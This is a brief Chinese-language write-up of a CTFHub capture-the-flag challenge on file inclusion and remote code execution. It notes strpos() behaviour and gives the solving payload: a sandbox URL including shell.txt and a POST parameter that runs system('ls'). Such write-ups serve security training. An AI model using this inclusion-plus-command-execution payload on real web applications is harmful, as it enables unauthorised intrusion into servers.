CTFHUB 檔案包含
ctfhub RCE 檔案包含 write up
審計一下代碼,鐵鐵們可以百度一下strpos()的漏洞哦
#函數查找字元串在另一字元串中第一次出現的位置(區分大小寫)
strpos("You love php, I love php too!","php");
“我有一個shell,怎麼用?” 這個是題目給的包含檔案
#request = post + get
于是構造payload,往ctfhub裡傳參
http://challenge-2bfb323ac5bd651f.sandbox.ctfhub.com:10080?file=shell.txt
post:ctfhub=system(‘ls’);
取走旗子,請大牛輕噴## ctfhub